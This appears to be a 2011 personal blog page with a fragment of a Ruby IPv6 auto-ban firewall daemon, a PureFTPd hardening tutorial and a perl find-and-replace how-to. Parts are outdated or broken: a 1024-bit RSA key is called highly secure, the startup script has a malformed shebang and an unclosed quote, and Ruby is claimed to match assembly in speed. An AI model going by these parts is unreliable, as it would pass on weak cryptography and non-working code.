        FIREWALL = "/usr/bin/ip6tables"
        # Connection checks and bans are logged here.
        LOG_FILE = "aa6.log"
        # IP Whitelist
        WHITELIST = %w{ 127.0.0.1 ::0\128 ::1\48 ::1\64 }  ##modded for IPv6
def initialize                               ## had to make this abit different so it would lookup any inet6 connects
        @connections = `netstat -ntu | grep 'inet6' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n`
        @log = Logger.new(LOG_FILE)
        daemonize                            ##ok lets damonise nice and silently so we dont make bash hang :>
        loop do
        run
        sleep(FREQUENCY)
        end
        end
        ## Ip6tables mod here
        def check(connections)
        connections.each { |connection|
        conn, ip = connection.split
        if conn.to_i > CONNECTION_LIMIT and not WHITELIST.include? ip
        `#{FIREWALL} -I INPUT -s #{ip} -j DROP`
        @log.info "[IP6T] Dropped -> #{ip} with -> #{conn} connects .."
        end
        }
        end
def run
        Thread.new {
        check @connections
        @log.info "[IP6T] Checked connections at -> #{Time.now} .."
        }.join
        end
        protected
        def daemonize
        exit if fork
        Process.setsid
        exit if fork
        Dir.chdir "/"
        File.umask 0000
        STDIN.reopen "/dev/null"
        STDOUT.reopen "/dev/null", "a"
        STDERR.reopen STDOUT
        trap("TERM") {
        exit
        }
        end
end
Attack.new

Thats it folks! Thats aa.rb and aa6.rb and they both work :)

If your thinking *but why ruby* ,then go do some speed checks when it is setup right ;) , it is basically same as asm , but easier to code ;P I love it! It is fastest way to block a flood at the iptable level,by miles over ANY scripts.
xd

Melrose PC Suppt // PC repairs/Maintenace // IT Consultant // Anti-Attack Services such as deplyment-on-attack svc // Much more..

comments: 8 » tags:

PureFTPD SECURE Install using PureDB (Linux/BSD)

Posted on 11th October 2011 in Papers

Just a quick, handy tute, i found already and decided to also use and add my own touches for bsd..
By xd

Ok for debian/ubuntu/centos, is pretty straightforward, for starters get openssl and then is maybe good idea to remove default /bin/ftp using yum or apt-get remove , and clean that, then start the pureftpd, note for BSD, it is installed through usr/ports/../ftp/pure-ftpd/ or pure-ftpd-ipv6/ for IPv6 forced (this is not needed though, you can use a simpler way ill outline later…)
lets begin the process… since it is a configuration directory, and, in some places, could also be a pure-ftpd.conf , wich still will take the SAME values, you will just have to play with that in etc/ ,for centos i believe this is the case.. On Debian, it has a directory i will work with debian install, wich can then be ported across easily enough.

OK lets begin, as i said, makesure you have things in order.. like openssl.. but it will prompt you in this howto anyhow ;)

root@box:~# cd /etc/pure-ftpd/conf/
root@box:/etc/pure-ftpd/conf# ls -la
total 24K
-rw-r–r– 1 root 36 2007-06-22 02:01 AltLog
-rw-r–r– 1 root 5 2007-06-22 02:01 MinUID
-rw-r–r– 1 root 4 2007-06-22 02:01 NoAnonymous
-rw-r–r– 1 root 4 2007-06-22 02:01 PAMAuthentication
-rw-r–r– 1 root 28 2007-06-22 02:01 PureDB
-rw-r–r– 1 root 3 2007-06-22 02:01 UnixAuthentication

Each of those files describes a commandline option of the pure-ftpd server.
For example, the file AltLog contains the format of,and path to the transfer log file:
root@box:/etc/pure-ftpd/conf# cat AltLog
clf:/var/log/pure-ftpd/transfer.log

Let’s now set some of the basic options by editing those one-liners (our server will listen to port 21 on all available interfaces, and will use IP 12.34.56.78 and ports 4500-4600 for passive mode – don’t forget to forward those from your NAT router if you are behind one):

root@box:/etc/pure-ftpd/conf# echo ,21 > Bind
root@box:/etc/pure-ftpd/conf# echo 12.34.56.78 > ForcePassiveIP
root@box:/etc/pure-ftpd/conf# echo 4500 4600 > PassivePortRange

Now for some recommended security stuff:
root@box:/etc/pure-ftpd/conf# echo yes > ChrootEveryone
root@box:/etc/pure-ftpd/conf# echo yes > ProhibitDotFilesRead
root@box:/etc/pure-ftpd/conf# echo yes > ProhibitDotFilesWrite
root@box:/etc/pure-ftpd/conf# echo yes > NoChmod
root@box:/etc/pure-ftpd/conf# echo yes > BrokenClientsCompatibility

Let’s also set some limits to avoid abuse:
root@box:/etc/pure-ftpd/conf# echo 4 > MaxClientsPerIP
root@box:/etc/pure-ftpd/conf# echo 20 > MaxClientsNumber

Now the important thing we need to decide is what user authorization method(s) our server will support. Options include Unix Authentication (anyone with a login account on the server will have ftp access), but I chose PureDB authentication, which involves a dedicated pure-ftpd “virtual users” base.
So let’s disable Unix and PAM auth, set the path to the PureDB user file, and add PureDB as an auth method by linking to it from the /etc/pure-ftpd/auth directory:

root@box:/etc/pure-ftpd/conf# echo no > PAMAuthentication
root@box:/etc/pure-ftpd/conf# echo no > UnixAuthentication
root@box:/etc/pure-ftpd/conf# echo /etc/pure-ftpd/pureftpd.pdb > PureDB
root@box:/etc/pure-ftpd/conf# ln -s /etc/pure-ftpd/conf/PureDB ../auth/50pure

Let’s now create a (system) user and group that will be bound to all ftp virtual users. For security reasons, that special user should have no home directory (-d /dev/null) and no shell access (-s /bin/false) :

root@box:/etc/pure-ftpd/conf# groupadd -g 2001 ftpgroup
root@box:/etc/pure-ftpd/conf# useradd -u 2001 -s /bin/false -d /dev/null -c “pureftpd user” -g ftpgroup ftpuser

Now we use the pure-pw command to add our first virtual-user,
This is as secure as it gets folks!

NOTE:
Don’t forget the “pure-pw mkdb” command:
it is required to commit/confirm changes to the user file

root@box:/etc/pure-ftpd/conf# pure-pw useradd myfirstuser -u ftpuser -d /var/ftp/public/
Password:
Enter it again:
root@box:/etc/pure-ftpd/conf# pure-pw mkdb
root@box:/etc/pure-ftpd/conf# apt-get install openssl
root@box:/etc/pure-ftpd/conf# echo 1 > TLS
root@box:/etc/pure-ftpd/conf# openssl req -x509 -nodes -newkey rsa:1024 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem
Generating a 1024 bit RSA private key

…itll ask you a few questions, just answer and proceed…

root@box:/etc/pure-ftpd/conf# chmod 600 /etc/ssl/private/pure-ftpd.pem

OK we are done!
This is one heck of a secure box now.. just makesure to use pure-pw and pure-db for the users, this will keep uid safe,and ofcourse,drectorys safe, from home/ in the b0x.

Let’s finally restart the server with our all-new config :

root@box:/etc/pure-ftpd/conf# /etc/init.d/pure-ftpd restart

Also note -6 will FORCE Ipv6 if you wish this, then i recommend googling a IPv6 install guide, altho on bsd, it is just a matter of using the pure-ftpd-ipv6 port :-) .
xd

Ok so, here we can do a small mod, and make a simple script:

This will be good for starting it up…

#!bin/bash
echo "starting PureFTPd in SSL-TLS/Passive mode on all devices on port 21 ..
/usr/sbin/pure-ftpd -l puredb:/etc/pure-ftpd/pureftpd.pdb -X -b -u 1000 -C 4 -E -S ,21 -x -c 20 -R -A -p 4500:4600 -O clf:/var/log/pure-ftpd/transfer.log -Y 1 -P 12.34.56.78 -B
echo "Started PureFTPd Ok .."

…thats it!

Enjoy the PureFTPd server .. and like i said, just modify according to OS with the debian suites, its very simple, Bsd is also very simple, but sometimes they may want the pure-ftpd.conf, wich is just same things, in a conf, note also about ipv6, you can force it in cmdline ftp.sh by adding -6 ,and it will work, but makesure your ipv6 can do reverse ipv6 and ipv4 lookups!
xd loves j00

comments: 0 » tags:

Mass find-and-replace text in files in Linux using perl cmds (reedit)

Posted on 4th October 2011 in Papers

How do I mass find and replace text in files under linux using perl?

Few friends have asked me how to do mass find and replace text in files under linux. There are quite a bit of options in linux to achieve mass replacing of text in files.
If you are doing it file by file, you can achieve that in vi by opening, running replace and closing and going to next file. But sometimes that can be very tedious and you would rather do mass replacement on all files containing certain extension.
We can do this by using sed or perl. Since most people are familiar with perl (at least most system admins and programmers), I will show you a perl way of doing it which you can use with sed as well if you wish.
First step is to get perl to do what we want on one file:

perl -w -i -p -e "s/search_text/replace_text/g" filename

-w turns warnings on
-i makes Perl operate on files in-place
(if you would like to make backups,use -i.bak,
this will save filename.bak files)
-p loops over the whole input
-e specifies Perl expression
filename works on one file at a time

Once we get the results we want, we can now pass it multiple files by doing something like:

perl -w -i -p -e "s/search_text/replace_text/g" *.php

This will search and replace within all php files in the directory you are in.

Now, let us say you want to go through your whole web directory and replace every place where you have “Perl is good” to “Perl is great”, you would use following command:

find /www_root -name "*.php"|xargs perl -w -i -p -e "s/Perl is good/perl is great/g"

find will start at /www_root, look for filenames which have .php extension, xargs takes that filename and passes it to perl as an arguement.

Read more: http://crazytoon.com/2007/10/29/linux-how-do-i-mass-find-and-replace-text-in-files-under-linux-using-perl/#ixzz1ZrT0WJim

Thx to Sonny for the help on some of this, as i have a .sh script wich does same.. i figured, easier to find something in perl,using regexp etc… and this is old but still great =)
Cheers,
xd

comments: 0 » tags: